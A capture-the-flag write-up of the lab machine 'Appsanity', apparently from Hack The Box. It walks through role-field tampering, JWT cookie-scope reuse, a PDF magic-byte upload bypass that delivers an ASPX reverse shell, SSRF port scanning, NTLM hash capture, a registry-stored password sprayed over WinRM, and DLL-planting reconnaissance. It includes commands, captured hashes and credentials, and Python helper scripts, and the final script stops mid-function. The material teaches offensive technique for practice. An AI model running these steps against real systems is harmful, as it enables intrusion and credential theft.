Appsanity
Recon
HTTPS (443)
HTTP redirects to HTTPS

We can sign up as a Patient.

Virtual-host fuzzing on the Host header found nothing over HTTP, but there is a subdomain over HTTPS:
└─$ domain='meddigi.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 2
└─$ domain='meddigi.htb'; ffuf -k -u "https://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 7
portal [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 375ms]
Our token

Become Doctor
When we sign up, the form carries a hidden field called Acctype. It is 1 by default (Patient); setting it to 0 creates no account, and 2 creates a Doctor.
The server trusts a client-controlled role field, so anyone can register as a Doctor.

Now we are a Doctor

When we add ourselves (the patient account) as a patient, the request carries our own ID, 7. Changing the ID to another user's doesn't show anything different in the response.

Portal
Let's visit the subdomain

└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -D -C 400,404 -S 155,324 -k --smart
by Ben "epi" Risher 🤓 ver: 2.10.3
405 GET 29l 107w 1293c https://portal.meddigi.htb/Login/Signin
200 GET 57l 162w 2976c https://portal.meddigi.htb/Login
200 GET 57l 162w 2976c https://portal.meddigi.htb/Login/Index
200 GET 8l 14w 194c https://portal.meddigi.htb/error
200 GET 1l 21w 14304c https://portal.meddigi.htb/favicon.ico
302 GET 0l 0w 0c https://portal.meddigi.htb/Login/logout => https://portal.meddigi.htb/
302 GET 0l 0w 0c https://portal.meddigi.htb/profile => https://portal.meddigi.htb/Login
405 GET 29l 107w 1293c https://portal.meddigi.htb/Login/signin
[####################] - 21s 9675/9675 0s found:19 errors:0
[####################] - 21s 4769/4769 231/s https://portal.meddigi.htb/
[####################] - 18s 4769/4769 272/s https://portal.meddigi.htb/Login/
The portal's login endpoints mirror the main site's, but the browser doesn't send the main domain's cookies to this subdomain: access_token is a host-only cookie, scoped to meddigi.htb exactly. Going back to the main domain and editing the cookie's Domain to .meddigi.htb
(note the leading dot) makes the browser send it to every subdomain.

Go back to the portal, refresh and voila! We are logged in as Doctor.
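To see what the portal is trusting, here is an added example (my code, not part of the writeup) that decodes the access_token used in the feroxbuster run below without verifying it, reports its lifetime, and models the RFC 6265 domain-matching rule that decides whether the cookie reaches portal.meddigi.htb. The token value is copied from the page; the cookie-scope function is my model of browser behaviour, not something the page shows.

```python
import base64
import json

# access_token copied from the authenticated feroxbuster run in this writeup
ACCESS_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3QwM0BtZWRkaWdpLmh0YiIsIm5iZiI6MTczMzUxMDMxNCwiZXhwIjoxNzMzNTEzOTE0LCJpYXQiOjE3MzM1MTAzMTQsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.ku_cPHpnCl-DtjxaA2mMMBSo4Bx4ZiuUYKPauMQEyF8"


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> tuple:
    """Split a compact JWS into (header, claims, signature) WITHOUT checking the signature.
    Recon only: a server must never act on claims read this way."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    return header, claims, b64url_decode(sig_b64)


def token_lifetime_seconds(claims: dict) -> int:
    return int(claims["exp"]) - int(claims["iat"])


def is_expired(claims: dict, now: int) -> bool:
    """exp is an absolute Unix time; RFC 7519 says reject once now >= exp."""
    return now >= int(claims["exp"])


def cookie_sent_to(request_host: str, cookie_domain: str, host_only: bool) -> bool:
    """RFC 6265 domain matching (my model; the page only shows the effect in the browser).
    host_only=True is what a Set-Cookie without a Domain attribute produces, which is why
    the token set on meddigi.htb never reached portal.meddigi.htb. Editing the cookie to
    Domain=.meddigi.htb turns it into a domain cookie; the leading dot is ignored."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    request_host = request_host.lower()
    if host_only:
        return request_host == cookie_domain
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


if __name__ == "__main__":
    header, claims, sig = decode_jwt_unverified(ACCESS_TOKEN)
    print(header)
    print(json.dumps(claims, indent=2))
    print(f"alg={header['alg']} sig={len(sig)} bytes lifetime={token_lifetime_seconds(claims)}s")
    for host in ("meddigi.htb", "portal.meddigi.htb"):
        print(host, "host-only:", cookie_sent_to(host, "meddigi.htb", True),
              "domain cookie:", cookie_sent_to(host, ".meddigi.htb", False))
```

The claims (unique_name 7, iss MedDigi, aud MedDigiUser, HS256, one-hour lifetime) are the same ones the portal accepts once the cookie reaches it, which is the real finding here: both apps validate the same issuer and audience with the same key, and nothing binds the token to the host that issued it.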

Upload Bypass
https://portal.meddigi.htb/examreport lets us upload files, but only PDFs.
The check is on the file's leading bytes, not on its name or structure: prepending the PDF magic (%PDF-) gets any file accepted as a PDF.

We get "Examination report sent to the management".
Content discovery with the doctor cookie, to find where the upload lands, turns up nothing interesting:
└─$ feroxbuster -u 'https://portal.meddigi.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -D -C 400,404 -S 155,324 -k --thorough -b 'access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3QwM0BtZWRkaWdpLmh0YiIsIm5iZiI6MTczMzUxMDMxNCwiZXhwIjoxNzMzNTEzOTE0LCJpYXQiOjE3MzM1MTAzMTQsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.ku_cPHpnCl-DtjxaA2mMMBSo4Bx4ZiuUYKPauMQEyF8' -I .js,.css,.png
200 GET 8l 14w 194c https://portal.meddigi.htb/error
200 GET 299l 847w 14600c https://portal.meddigi.htb/examreport
200 GET 205l 553w 10059c https://portal.meddigi.htb/Scheduler
200 GET 237l 628w 12236c https://portal.meddigi.htb/Equipment
200 GET 148l 485w 9462c https://portal.meddigi.htb/Profile
200 GET 349l 1067w 17935c https://portal.meddigi.htb/Prescriptions
200 GET 148l 485w 9462c https://portal.meddigi.htb/profile
200 GET 8l 14w 194c https://portal.meddigi.htb/Error
405 GET 29l 107w 1293c https://portal.meddigi.htb/Equipment/EquipmentRequest
200 GET 237l 628w 12236c https://portal.meddigi.htb/equipment
405 GET 29l 107w 1293c https://portal.meddigi.htb/Scheduler/Schedule
200 GET 205l 553w 10059c https://portal.meddigi.htb/scheduler
405 GET 29l 107w 1293c https://portal.meddigi.htb/Prescriptions/SendEmail
200 GET 44l 87w 1792c https://portal.meddigi.htb/Prescriptions/ViewPrescription/2
405 GET 29l 107w 1293c https://portal.meddigi.htb/Prescriptions/AddPrescription
200 GET 44l 87w 1780c https://portal.meddigi.htb/Prescriptions/ViewPrescription/1
200 GET 349l 1067w 17935c https://portal.meddigi.htb/prescriptions
[####################] - 4m 179058/179058 668/s https://portal.meddigi.htb/
SSRF
Meanwhile in Prescriptions we have SSRF

Port 80 answers only after a long delay (about 21 s), while the other ports come back in about 2 s. That difference is the timing side channel of this SSRF: a closed port fails fast, an open one keeps the server waiting.
└─$ ffuf -request ssrf.req -w <(seq 79 81) -mc all -k -t 10 -timeout 100000
v2.1.0-dev
79 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2138ms]
81 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2137ms]
80 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 21148ms]
So we can filter on response time and drop anything that comes back in under 3 s:
└─$ ffuf -request ssrf.req -w /usr/share/seclists/Discovery/Infrastructure/common-http-ports.txt -mc all -k -t 10 -ft '<3000'
v2.1.0-dev
1434 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4097ms]
4001 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 4000ms]
6346 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3994ms]
30821 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3906ms]
8080 [Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 8832ms]

SSRF to RCE
Looks like we can view reports, but ours is long gone. I'm going to switch the payload to a straight reverse shell, since an interactive session through this path doesn't look promising.
└─$ curl -LOs 'https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx'
└─$ nano shell.aspx # Change IP:PORT
└─$ sed -i '1s/^/%PDF-\n/' shell.aspx
└─$ file shell.aspx
shell.aspx: PDF document, version \012.%
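Added example, not the writeup's own code: what the %PDF- prefix from the sed command does to a magic-bytes check like the one the upload bypass above relies on, next to a stricter structural check that catches the polyglot. The ASPX body and the minimal PDF are constructed here; the real payload is the shell.aspx fetched above.

```python
import re

# Constructed stand-in for a server-side page; the real payload is the shell.aspx fetched above.
ASPX_PAYLOAD = b'<%@ Page Language="C#" %>\r\n<% Response.Write("hello"); %>\r\n'


def make_pdf_polyglot(payload: bytes) -> bytes:
    """Same effect as `sed -i '1s/^/%PDF-\\n/' shell.aspx`: prepend the PDF magic and leave the
    rest untouched. The page still ran for the writeup; the prefix is just literal content."""
    return b"%PDF-\n" + payload


def naive_is_pdf(data: bytes) -> bool:
    """What the portal's upload filter appears to do (and what `file` keyed on): magic bytes only."""
    return data.startswith(b"%PDF-")


def strict_is_pdf(data: bytes) -> bool:
    """Structural check: versioned header, at least one object, a trailer or /Root reference,
    %%EOF near the end, and no server-side script markers anywhere. Still a heuristic: the durable
    fix is to store uploads outside the web root under a server-chosen name and never execute them."""
    if not re.match(rb"%PDF-\d\.\d", data):
        return False
    if b"%%EOF" not in data[-1024:]:
        return False
    if not re.search(rb"\d+ \d+ obj", data):
        return False
    if b"trailer" not in data and b"/Root" not in data:
        return False
    if b"<%" in data or b"<script" in data.lower():
        return False
    return True


def minimal_pdf() -> bytes:
    """Tiny but structurally valid PDF, constructed here as the positive control."""
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"trailer << /Root 1 0 R >>\n"
            b"%%EOF\n")


if __name__ == "__main__":
    poly = make_pdf_polyglot(ASPX_PAYLOAD)
    print("polyglot  naive:", naive_is_pdf(poly), " strict:", strict_is_pdf(poly))
    print("real pdf  naive:", naive_is_pdf(minimal_pdf()), " strict:", strict_is_pdf(minimal_pdf()))
```

Even the strict check is only a speed bump: a real PDF with an ASPX body appended passes every structural test except the script-marker scan. What actually closes the hole is that the stored file is later fetched by name through ViewReport.aspx on port 8080 and executed by IIS; keep uploads out of any handler that can run them.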
Reverse Shell (svc_exampanel)
Upload -> SSRF on 8080 -> https://portal.meddigi.htb/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Change protocol, url and port => http://127.0.0.1:8080/ViewReport.aspx?file=5c7b8af3-70d9-4d94-bcfd-4fcd5dc4ca98_shell.aspx -> Get reverse shell
└─$ listen
Ncat: Connection from 10.129.146.201:63867.
c:\windows\system32\inetsrv>whoami /all
User Name SID
======================= ==============================================
appsanity\svc_exampanel S-1-5-21-4111732528-4035850170-1619654654-1007
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\ExamPanel Well-known group S-1-5-82-2916625395-3930688606-393764215-2099654449-2832396995 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\svc_exampanel> tree /f /a
Folder PATH listing
Volume serial number is F854-971D
C:.
+---Desktop
| user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Logs
| examinationpanel_log.txt
|
+---Music
+---Pictures
+---Saved Games
\---Videos
User.txt
PS C:\Users\svc_exampanel> cat Desktop/user.txt
f64ef2f5cbcc99aada5389c877c30157
Privilege Escalation (devdoc)
└─$ impacket-smbserver -smb2support share .
...
[*] User APPSANITY\svc_exampanel authenticated successfully
[*] svc_exampanel::APPSANITY:aaaaaaaaaaaaaaaa:cd9f45b69047d149c99344c6483a29fa:0101000000000000000a9d521848db014d1324d1600ecc2c000000000100100064005400720042006a00710072006c000300100064005400720042006a00710072006c00020010005500720061006b006600450074007900040010005500720061006b00660045007400790007000800000a9d521848db01060004000200000008003000300000000000000000000000002000008bab6c70d6764e6ec03ffd91cb9390567266fcefeabfb3c0c175479af389f5580a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
...
---
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> xcopy ExaminationManagement.dll \\10.10.14.113\share
Decompile the DLL https://www.decompiler.com/jar/7d19edcf2760481892228654a92d724b/ExaminationManagement.dll
It reads some kind of decryption key from the registry:

PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> reg query "HKLM\Software\MedDigi"
HKEY_LOCAL_MACHINE\Software\MedDigi
EncKey REG_SZ 1g0tTh3R3m3dy!!
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> Get-ItemProperty "Registry::HKLM\Software\MedDigi"
EncKey : 1g0tTh3R3m3dy!!
PSPath : Microsoft.PowerShell.Core\Registry::HKLM\Software\MedDigi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKLM\Software
PSChildName : MedDigi
PSProvider : Microsoft.PowerShell.Core\Registry
This looks like a password.
Get the users
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> net user
User accounts for \\APPSANITY
-------------------------------------------------------------------------------
Administrator DefaultAccount devdoc
Guest svc_exampanel svc_meddigi
svc_meddigiportal WDAGUtilityAccount
Spray the password over WinRM (SMB wasn't open externally):
└─$ netexec winrm meddigi.htb -u users.txt -p '1g0tTh3R3m3dy!!'
WINRM 10.129.146.201 5985 APPSANITY [*] Windows 10 / Server 2019 Build 19041 (name:APPSANITY) (domain:Appsanity)
WINRM 10.129.146.201 5985 APPSANITY [-] Appsanity\Administrator:1g0tTh3R3m3dy!!
WINRM 10.129.146.201 5985 APPSANITY [-] Appsanity\DefaultAccount:1g0tTh3R3m3dy!!
WINRM 10.129.146.201 5985 APPSANITY [+] Appsanity\devdoc:1g0tTh3R3m3dy!! (Pwn3d!)
WinRM
└─$ evil-winrm -i meddigi.htb -u devdoc -p '1g0tTh3R3m3dy!!'
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami /all
User Name SID
================ ==============================================
appsanity\devdoc S-1-5-21-4111732528-4035850170-1619654654-1002
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Enumerate with winpeas
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> .\wp.exe | tee -filepath wp.log
--------- Autorun Applications
Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: SecurityHealth
Folder: C:\Windows\system32
File: C:\Windows\system32\SecurityHealthSystray.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
=================================================================================================
RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RegPerms: devdoc [FullControl]
Key: MicrosoftEdgeAutoLaunch_52C6AD3EEF59818F619BA8CCF0498CC4
Folder: C:\Program Files (x86)\Microsoft\Edge\Application
File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start /prefetch:5 (Unquoted and Space detected) - C:\
=================================================================================================
RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RegPerms: devdoc [FullControl]
Key: OneDrive
Folder: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive
FolderPerms: devdoc [AllAccess]
File: C:\Users\devdoc\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
FilePerms: devdoc [AllAccess]
=================================================================================================
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
Folder: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: devdoc [AllAccess]
File: C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\devdoc\AppData\Roaming\Microsoft\Windows,C:\Users\devdoc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
FilePerms: devdoc [AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
--------- Enumerating Office 365 endpoints synced by OneDrive.
SID: S-1-5-21-4111732528-4035850170-1619654654-1002
Name: Business1
UserFolder C:\Users\devdoc\OneDrive
Name: Personal
UserFolder C:\Users\devdoc\OneDrive
--------- Current TCP Listening Ports
Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 100 0.0.0.0 0 Listening 3912 ReportManagement
TCP 0.0.0.0 135 0.0.0.0 0 Listening 916 svchost
TCP 0.0.0.0 443 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5040 0.0.0.0 0 Listening 5168 svchost
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 8080 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 684 lsass
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 544 wininit
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 1096 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 1692 svchost
TCP 0.0.0.0 49668 0.0.0.0 0 Listening 668 services
TCP 10.129.146.201 139 0.0.0.0 0 Listening 4 System
TCP 10.129.146.201 5985 10.10.14.113 52528 Established 4 System
Port 100 is bound to a process called ReportManagement (port 80 and 443 belong to System, i.e. http.sys for IIS), and it lives in Program Files:
*Evil-WinRM* PS C:\Program Files\ReportManagement> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2023 11:33 AM Libraries
-a---- 5/5/2023 5:21 AM 34152 cryptbase.dll
-a---- 5/5/2023 5:21 AM 83744 cryptsp.dll
-a---- 3/11/2021 9:22 AM 564112 msvcp140.dll
-a---- 9/17/2023 3:54 AM 140512 profapi.dll
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe
-a---- 10/20/2023 1:47 PM 11492864 ReportManagementHelper.exe
-a---- 3/11/2021 9:22 AM 96144 vcruntime140.dll
-a---- 3/11/2021 9:22 AM 36752 vcruntime140_1.dll
-a---- 5/5/2023 5:21 AM 179248 wldp.dll
Privilege Escalation (Administrator)
Of the two binaries we can only read ReportManagement.exe; copying the helper out is denied.
*Evil-WinRM* PS C:\Program Files\ReportManagement> xcopy ReportManagement* \\10.10.14.113\share
C:ReportManagement.exe
C:ReportManagementHelper.exe
xcopy.exe : Access denied
+ CategoryInfo : NotSpecified: (Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
└─$ ghidra_auto -c ReportManagement.exe
[*] File Ouput:
PE32+ executable (GUI) x86-64
for MS Windows
6 sections
...
└─$ strings ReportManagement.exe -n 10
C:\inetpub\ExaminationPanel\ExaminationPanel\Reports
C:\Users\Administrator\Backup
reportmanagement_log.txt
Failed to receive data from client.
Available Commands:
backup: Perform a backup operation.
validate: Validates if any report has been altered since the last backup.
recover <filename>: Restores a specified file from the backup to the Reports folder.
upload <external source>: Uploads the reports to the specified external source.
Backup operation completed successfully.
An error occurred during the backup operation.
Invalid command. Missing parameter after 'upload'. Type 'help' for available commands.
C:\Program Files\ReportManagement\Libraries
externalupload
Failed to upload to external source.
Attempting to upload to external source.
Invalid command. Type 'help' for available commands.
An error occurred while processing the upload command.
(Hash mismatch)
Altered file found:
(Hash file not found)
Validation completed.
Validation completed. All reports are intact.
An error occurred during the validation operation.
Validation failed
Invalid command. Missing filename after 'recover'. Type 'help' for available commands.
File successfully recovered from backup.
The file appears to be tampered with and cannot be recovered.
Specified file not found in the backup directory.
Failed to initialize Winsock.
Failed to create socket.
Failed to bind socket.
Failed to accept incoming connection.
Reports Management administrative console. Type "help" to view available commands.
invalid string position
vector too long
unknown error
create_directory
was not found.
Source directory
Error: Directory not found.
Access denied when trying to create directory
Failed to create hash file for
Filesystem error occurred during backup.
Error Details:
Error occurred during backup.
...
From the strings, a rough guess: it loads DLLs from C:\Program Files\ReportManagement\Libraries, and the externalupload string sitting next to the upload messages suggests that is the library the upload command loads.

*Evil-WinRM* PS C:\Users\devdoc\Documents> ls 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Users\devdoc\Documents> Get-ACL 'C:\\Program Files\\ReportManagement\\Libraries' | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\ReportManagement\Libraries
Owner : BUILTIN\Administrators
Group : APPSANITY\None
Access : APPSANITY\devdoc Allow Write, ReadAndExecute, Synchronize
BUILTIN\Administrators Allow FullControl
CREATOR OWNER Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow Read, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-4111732528-4035850170-1619654654-513D:AI(A;OICI;0x1201bf;;;S-1-5-21-4111732528-4035850170-1619654654-1002)(A;ID;FA;;;BA)(A;OICIIOID;FA;;;CO)(A;OICIID;FA;;;SY)(A;OICIIOID;FA;;;BA)(A;OICIID;FR;;;BU)(A;CIID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;OICIID;0x1200a9;;;AC)(A;OICIID;0x1200a9;;;S-1-15-2-2)
*Evil-WinRM* PS C:\Users\devdoc\Documents> cd 'C:\\Program Files\\ReportManagement\\Libraries'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> echo x > x
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2024 11:51 PM 8 x
The directory is empty and we have write access to it.
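Added example (mine, not from the writeup): an SDDL DACL parser run over the Sddl string Get-ACL printed above (the TrustedInstaller SID wrapped across two lines in that output and is joined here). It decodes the hex access masks into the individual file rights and flags the single explicit, non-inherited Allow that hands devdoc write-class rights, which is the ACE that makes Libraries usable for DLL planting. The rights values and two-letter aliases are the standard winnt.h/SDDL ones.

```python
import re

# Sddl string from Get-Acl on C:\Program Files\ReportManagement\Libraries (copied from this writeup,
# with the TrustedInstaller SID re-joined after the console output wrapped it).
LIBRARIES_SDDL = (
    "O:BAG:S-1-5-21-4111732528-4035850170-1619654654-513"
    "D:AI(A;OICI;0x1201bf;;;S-1-5-21-4111732528-4035850170-1619654654-1002)(A;ID;FA;;;BA)"
    "(A;OICIIOID;FA;;;CO)(A;OICIID;FA;;;SY)(A;OICIIOID;FA;;;BA)(A;OICIID;FR;;;BU)"
    "(A;CIID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)"
    "(A;OICIID;0x1200a9;;;AC)(A;OICIID;0x1200a9;;;S-1-15-2-2)"
)
DEVDOC_SID = "S-1-5-21-4111732528-4035850170-1619654654-1002"  # from `whoami /all` as devdoc above

# Specific file/directory access bits plus the standard rights (winnt.h values)
FILE_RIGHTS = {
    0x00000001: "FILE_READ_DATA", 0x00000002: "FILE_WRITE_DATA", 0x00000004: "FILE_APPEND_DATA",
    0x00000008: "FILE_READ_EA", 0x00000010: "FILE_WRITE_EA", 0x00000020: "FILE_EXECUTE",
    0x00000040: "FILE_DELETE_CHILD", 0x00000080: "FILE_READ_ATTRIBUTES", 0x00000100: "FILE_WRITE_ATTRIBUTES",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
# SDDL two-letter aliases for the file generic mappings
SDDL_RIGHTS = {"FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0}
# Rights that let a principal add, replace or delete content, or rewrite the ACL itself
WRITE_CLASS = 0x2 | 0x4 | 0x40 | 0x10000 | 0x40000 | 0x80000

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_mask(rights: str) -> int:
    """Hex mask as-is; otherwise OR together two-letter SDDL aliases (e.g. 'FRFX')."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]  # KeyError on an alias we don't model: fail loudly
    return mask


def parse_dacl(sddl: str) -> list:
    """Return the DACL's ACEs as dicts. ACE syntax: (type;flags;rights;object_guid;inherit_guid;trustee)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    aces = []
    for body in ACE_RE.findall(dacl):
        ace_type, flags, rights, _obj, _inh, trustee = body.split(";")
        flag_list = [flags[i:i + 2] for i in range(0, len(flags), 2)]
        mask = parse_mask(rights)
        aces.append({
            "type": ace_type,                 # A = Allow, D = Deny
            "flags": flag_list,               # OI/CI = inherits to files/subdirs, ID = ACE itself was inherited
            "inherited": "ID" in flag_list,
            "mask": mask,
            "rights": [name for bit, name in FILE_RIGHTS.items() if mask & bit],
            "trustee": trustee,
        })
    return aces


def writable_by(aces: list, sids: set) -> list:
    """Allow ACEs granting write-class rights to any SID in `sids`. Pass the low-privileged
    principals you hold; Administrators/SYSTEM/CREATOR OWNER are expected to carry FA."""
    return [a for a in aces
            if a["type"] == "A" and a["trustee"] in sids and (a["mask"] & WRITE_CLASS)]


def describe(ace: dict) -> str:
    origin = "inherited" if ace["inherited"] else "EXPLICIT"
    return f"{ace['type']} {origin:9} {ace['trustee']} 0x{ace['mask']:06x} {'|'.join(ace['rights'])}"


if __name__ == "__main__":
    aces = parse_dacl(LIBRARIES_SDDL)
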